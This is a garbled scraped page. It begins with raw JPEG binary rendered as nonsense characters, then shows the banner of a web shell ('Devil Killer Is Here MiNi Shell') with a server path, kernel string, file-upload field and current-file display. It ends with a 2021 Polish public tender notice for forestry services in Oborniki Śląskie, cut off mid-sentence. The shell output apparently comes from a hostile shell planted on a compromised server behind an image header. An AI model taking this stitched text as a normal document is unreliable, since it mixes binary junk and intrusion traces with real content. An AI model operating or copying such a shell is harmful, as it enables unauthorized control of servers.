JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210723/0012550401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00125504 z dnia 2021-07-23</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Wykonywanie usług z zakresu gospodarki leśnej na terenie Nadleśnictwa Oborniki Śląskie w roku 2021 w leśnictwie Trzebnica” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa - Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Oborniki Śląskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931024037</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wrocławska 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oborniki Śląskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">55-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">713105760</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">713105761</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">oborniki@wroclaw.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.oborniki.wroclaw.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Wykonywanie usług z zakresu gospodarki leśnej na terenie Nadleśnictwa Oborniki Śląskie w roku 2021 w leśnictwie Trzebnica” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4168ae91-eba6-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00125504</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wroclaw-lasy.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">wroclaw-lasy.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Sposób sporządzenia i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U.z 2020 r. poz. 2452).2.W celu skorzystania z Platformy konieczna jest rejestracja Wykonawcy pod adresem: wroclaw-lasy.logintrade.net po kliknięciu na przycisk „Rejestracja w bazie wykonawców”,następnie należy wypełnić wszystkie pola oznaczone „gwiazdką”, i kliknąć ikonę „Zarejestruj się”.Wykonawca rejestrując się akceptuje warunki korzystania z Platformy, określone w Regulaminiepodczas rejestracji oraz uznaje go za wiążący. Korzystanie z Platformy jest bezpłatne. Podgląd i<br/>pobieranie dokumentacji postępowania nie wymaga logowania. 3.Zamawiający, informuje, że Platforma jest kompatybilna ze wszystkimi podpisami elektronicznymi. Do przesłania dokumentów i złożenia oferty nie jest niezbędne posiadanie certyfikatu kwalifikowanego. 4Wymagania techniczne związane z korzystaniem z Platformy przetargowej – wskazane są w regulaminie i instrukcji<br/>dostępnych na stronie internetowej Platformy przetargowej - pod adresem: wroclaw-lasy.logintrade.net. Regulamin korzystania z platformy - załącznik nr 13 do SWZ.6.Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub<br/>wniosku oraz do komunikacji wynosi 150 MB.7.Ofertę oraz oświadczenia, składane na podstawie art.125 ust. 1 PZP sporządza się, pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Zgodnie z art. 781 Kodeksu<br/>cywilnego do zachowania elektronicznej formy czynności prawnej wystarcza złożenie oświadczenia woli w postaci elektronicznej i opatrzenie go kwalifikowanym podpisem elektronicznym8. złożenie, zmiana i wycofanie oferty lub następuje wyłącznie w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym, za pośrednictwem Platformy. 9.wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa,powinny zostać złożone w osobnym pliku wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa”.10.Wykonawca może zwrócić się do Zamawiającego z wnioskiem o wyjaśnienie treści SWZ. Zamawiający jest obowiązany udzielić<br/>wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert pod warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do zamawiającego nie później niż na 4 przed upływem terminu składania ofert.11.,Komunikacja między Zamawiającym, a Wykonawcami odbywa się<br/>przy użyciu środków komunikacji elektronicznej za pośrednictwem platformy wroclaw-lasy.logintrade.net („Platforma” lub „Platforma przetargowa”) oraz poczty elektronicznej email oborniki@wroclaw.lasy.gov.pl joanna.gonera@wroclaw.lasy.gov.pl, z zastrzeżeniem, że złożenie<br/>oferty następuje wyłącznie przy użyciu platformy wroclaw-lasy.logintrade.net</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna została zawarta w rozdziale XXI<br/>SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w rozdziale XXI<br/>SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SAZ.270.1.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 772015,01 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi z zakresu gospodarki leśnej zgodnie z określeniem w art. 6<br/>ust. 1 pkt. 1 ustawy z dnia 28 września 1991 r. o lasach (tekst jedn.: Dz. U. z 2020 r., poz. 1463<br/>z późn. zm. – „Ustawa o lasach”) obejmujące prace z zakresu hodowli i ochrony lasu, ochrony<br/>przeciwpożarowej, pozyskania i zrywki drewna, podwozu drewna oraz utrzymania obiektów<br/>leśnych oraz pozostałej działalności ubocznej, do wykonania na terenie Nadleśnictwa Oborniki<br/>Śląskie w leśnictwie Trzebnica w roku 2021.Zakres rzeczowy przedmiotu zamówienia obejmuje<br/>sumaryczne ilości prac z zakresu hodowli i ochrony lasu, ochrony przeciwpożarowej, pozyskania<br/>i zrywki drewna, podwozu drewna oraz utrzymania obiektów leśnych oraz pozostałej działalności<br/>ubocznej<br/>wynikające z załącznika nr 3 do SWZ, na który składają się:- załączniki:3.1;3,2;3,3;3,4;3,5;3,6;3,7.Zakresy rzeczowe zestawione w załącznikach nr 3.1, 3.2,<br/>3.3, oraz 3.5 mają charakter szacunkowy.Standardy jakościowe odnoszące się do wszystkich<br/>istotnych cech przedmiotu zamówienia, określa pismo Dyrektora RDLP we Wrocławiu z dnia<br/>26.06.2020 r. (znak sprawy DZ.0070.1.2020) dotyczące stosowania standardów jakościowych.<br/>Określony z tej decyzji szczegółowy opis standardu technologii wykonywania poszczególnych<br/>prac leśnych (czynności) wchodzących w skład przedmiotu zamówienia został zawarty w<br/>załączniku nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77200000-2 - Usługi leśnictwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">75251120-7 - Usługi ochrony przeciwpożarowej lasów</p> <p class="mb-0">77200000-2 - Usługi leśnictwa</p> <p class="mb-0">77210000-5 - Usługi pozyskiwania drewna</p> <p class="mb-0">77211000-2 - Usługi uboczne związane z pozyskiwaniem drewna</p> <p class="mb-0">77211100-3 - Usługi cięcia drewna</p> <p class="mb-0">77211200-4 - Transport dłużyc na terenie lasów</p> <p class="mb-0">77211300-5 - Usługi selekcji drzew</p> <p class="mb-0">77211400-6 - Usługi wycinania drzew</p> <p class="mb-0">77211500-7 - Usługi pielęgnacji drzew</p> <p class="mb-0">77211600-8 - Sadzenie drzew</p> <p class="mb-0">77230000-1 - Usługi doraźne dotyczące leśnictwa</p> <p class="mb-0">77231200-0 - Usługi zwalczania szkodników leśnych</p> <p class="mb-0">77231600-4 - Usługi zalesiania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1W stosunku do przedmiotu zamówienia Zamawiający jest uprawniony zlecić Wykonawcy<br/>dodatkowy zakres rzeczowy obejmujący czynności takie same (analogiczne), jak opisane w<br/>opisie przedmiotu zamówienia („Opcja”). Przedmiotem Opcji będą prace analogiczne, jak<br/>opisane w SWZ (i wycenione przez Wykonawcę w kosztorysie ofertowym stanowiącym część<br/>Oferty). W ramach Opcji, wedle wyboru Zamawiającego, mogą zostać zlecone wszystkie,<br/>niektóre lub jedna z prac wskazanych w SWZ (i wycenionych przez Wykonawcę w kosztorysie<br/>ofertowym stanowiącym część Oferty). Zamawiający nie jest zobowiązany do zlecenia prac<br/>objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie. Prace będące<br/>przedmiotem Opcji mogą zostać zlecone w ilości stanowiącej równowartość do 20 % wartości<br/>przedmiotu zamówienia określonej zgodnie z § 10 ust 1 wzoru umowy stanowiącego załącznik nr<br/>12 do SWZ. Podstawą określenia wartości prac zleconych w ramach Opcji (w celu określenia jej<br/>zakresu) będą ceny jednostkowe poszczególnych prac zawarte w kosztorysie ofertowym<br/>stanowiącym część Oferty2Zamawiający przewiduje możliwość skorzystania z Opcji w<br/>przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego usług stanowiących<br/>przedmiot zamówienia na skutek warunków przyrodniczych bądź atmosferycznych, zmian na<br/>rynku sprzedaży drewna lub powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych, jak również w sytuacji braku możliwości wyłonienia z przyczyn obiektywnych<br/>wykonawców usług leśnych w ramach podstawowych trybów udzielania zamówień, celem<br/>zabezpieczenia niezbędnego wykonawstwa prac oraz w przypadku powierzania wykonawcy<br/>prac stanowiących wykonawstwo zastępcze w stosunku do prac realizowanych przez innego<br/>wykonawcę. 3.Wartość opcji : 85 779,45 zł netto <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1.Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214<br/>ust. 1 pkt 7) PZP w zw. z art. 305 ust. 1 PZP, w okresie 3 lat od dnia udzielenia zamówienia<br/>podstawowego 2.Zamówienia, o których mowa w pkt 1 oraz w pkt. 3.7. SWZ będą polegały na<br/>powtórzeniu usług zgodnych z usługami stanowiącymi przedmiot niniejszego zamówienia oraz usług<br/>podobnych do nich w aspekcie technologicznym ich wykonawstwa. Zakresem rzeczowym usług<br/>stanowiących przedmiot zamówień, o których mowa w pkt 1 oraz pkt 3.7. SWZ. objęte będą prace z<br/>zakresu hodowli i ochrony lasu, ochrony przeciwpożarowej, pozyskania i zrywki drewna obejmujące<br/>czynności wskazane rodzajowo w załączniku nr 3 do SWZ, które wynikają z planów urządzenia lasu<br/>obowiązujących na obszarze administracyjnym Nadleśnictwa Oborniki Śląskie. 3. 3.9. Szczegółowy<br/>opis standardu technologii wykonawstwa prac wchodzących w skład zamówień, o których mowa w pkt<br/>1 oraz pkt 3.7.SWZ zawarty został w załączniku nr 4 do SWZ 4. 3.10. Zakres rzeczowy usług<br/>stanowiących przedmiot zamówień, o których mowa w pkt 1 oraz pkt 3.7. SWZ nie przekroczy wartości<br/>50 % wartości niniejszego zamówienia. 5. Zamówienia, o których mowa w pkt 3.7. SWZ będą udzielane<br/>po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie<br/>zamówienia z wolnej ręki. 6. Zamówienia, o których mowa w pkt 1 oraz pkt 3.7. SWZ będą udzielane w<br/>przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego usług stanowiących przedmiot<br/>zamówienia na skutek warunków przyrodniczych bądź atmosferycznych, zmian na rynku sprzedaży<br/>drewna lub powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych, jak również w<br/>sytuacji braku możliwości wyłonienia z przyczyn obiektywnych wykonawców usług leśnych w ramach<br/>podstawowych trybów udzielania zamówień, celem zabezpieczenia niezbędnego wykonawstwa prac<br/>oraz w przypadku powierzania wykonawcy prac stanowiących wykonawstwo zastępcze w stosunku do<br/>prac realizowanych przez innego wykonawcę.7.Miejscem realizacji zamówień będzie obszar<br/>administracyjny Nadleśnictwa Oborniki Śląskie. 8 Wartość zamówień o których mowa w art. 214 ust. 1<br/>pkt 7) PZP w zw. z art. 305 ust. 1 PZP wynosi : 257 338,34 zł netto</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W ramach kryterium „Cena” ocena ofert zostanie dokonana przy<br/>zastosowaniu wzoru:<br/>Cn<br/>C = ------------ x100 pkt x 60 %<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w Ofercie(załącznik nr<br/>1 do SWZ).Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór<br/>prowadziłby do<br/>powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i<br/>usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od<br/>towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>W ramach kryterium „Samodzielna realizacja kluczowych elementów (części) zamówienia” oceniane<br/>będzie przyjęcie przez wykonawcę zobowiązania umownego do wykonywania kluczowych elementów (części) zamówienia, określonych przez Zamawiającego w SWZ, samodzielnie przez wykonawcę<br/>składającego ofertę, tj. bez udziału podwykonawców. Zasady realizacji tego zobowiązania oraz zasady<br/>odpowiedzialności za jego niewykonanie zostały opisane we wzorze umowy (stanowiącym załącznik nr<br/>12 do SWZ). We wzorze umowy (stanowiącym załącznik nr 12 do SWZ) zobowiązanie do<br/>wykonywania kluczowych elementów (części) zamówienia, określonych przez Zamawiającego w SWZ,<br/>samodzielnie przez wykonawcę składającego Ofertę, tj. bez udziału podwykonawców jest określane<br/>jako „Obowiązek Samodzielnej Realizacji”. Kluczowe elementy (części) zamówienia obejmują<br/>następujące czynności:<br/>- pozyskanie i zrywka drewna.<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego do samodzielnej<br/>realizacji kluczowych części zamówienia w Ofercie (załącznik nr 1 do SWZ). Brak wskazania w Ofercie<br/>przyjęcia przez wykonawcę zobowiązania, o którym mowa w zdaniu poprzednim będzie uznawane jako<br/>nieprzyjęcie takiego zobowiązania, a Oferta wykonawcy uzyska 0 pkt w ramach niniejszego kryterium<br/>oceny ofert. Oferta wykonawcy, który zaciągnie takie zobowiązanie otrzyma 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Samodzielna realizacja kluczowych elementów (części) zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony, jeśli Wykonawca wykaże,<br/>że posiada środki finansowe lub zdolność kredytową nie mniejszą niż 20 000 zł (słownie:<br/>dwadzieścia pięć tysięcy zł). 2.Warunek w zakresie doświadczenia, zostanie uznany za<br/>spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat od dnia w którym upływa termin<br/>składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) zrealizował<br/>lub realizuje (przy czym w tym przypadku będzie liczona wartość zrealizowanej części<br/>przedmiotu umowy) co najmniej 1 usługę (przez usługę rozumie się wykonywanie prac na<br/>podstawie 1 umowy) polegającą na wykonywaniu prac z zakresu zagospodarowania lasu, zrywki<br/>i pozyskania drewna na kwotę nie mniejszą niż 200 000 zł brutto. 3.Warunek w zakresie<br/>potencjału technicznego, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje<br/>lub będzie dysponować:<br/>- co najmniej 1 szt. maszyn leśnych typu harwester lub ciągnik rolniczy zagregowany z głowicą<br/>ścinkową,- co najmniej 1 szt. ciągnika zrywkowego lub ciągnika przystosowanego do zrywki<br/>drewna,- co najmniej 1 szt. ciągnika agregowalnego z pługiem do przygotowania gleby i co<br/>najmniej 1 szt. pługa do przygotowania gleby typu LPZ-75 przeznaczonych do mechanicznego<br/>wykonania bruzd,<br/>- co najmniej 1 szt. ciągnika agregowanego<br/>z rozdrabniaczem do gałęzi i 1 szt. rozdrabniacza do gałęzi,<br/>- co najmniej 1 szt. ciągnika rolniczego z przyczepą,<br/>- co najmniej 1 szt. ręcznego opryskiwacza wyposażonego w atomizer,<br/>- co najmniej 1 szt. pilarki na wysięgniku o długości całkowitej 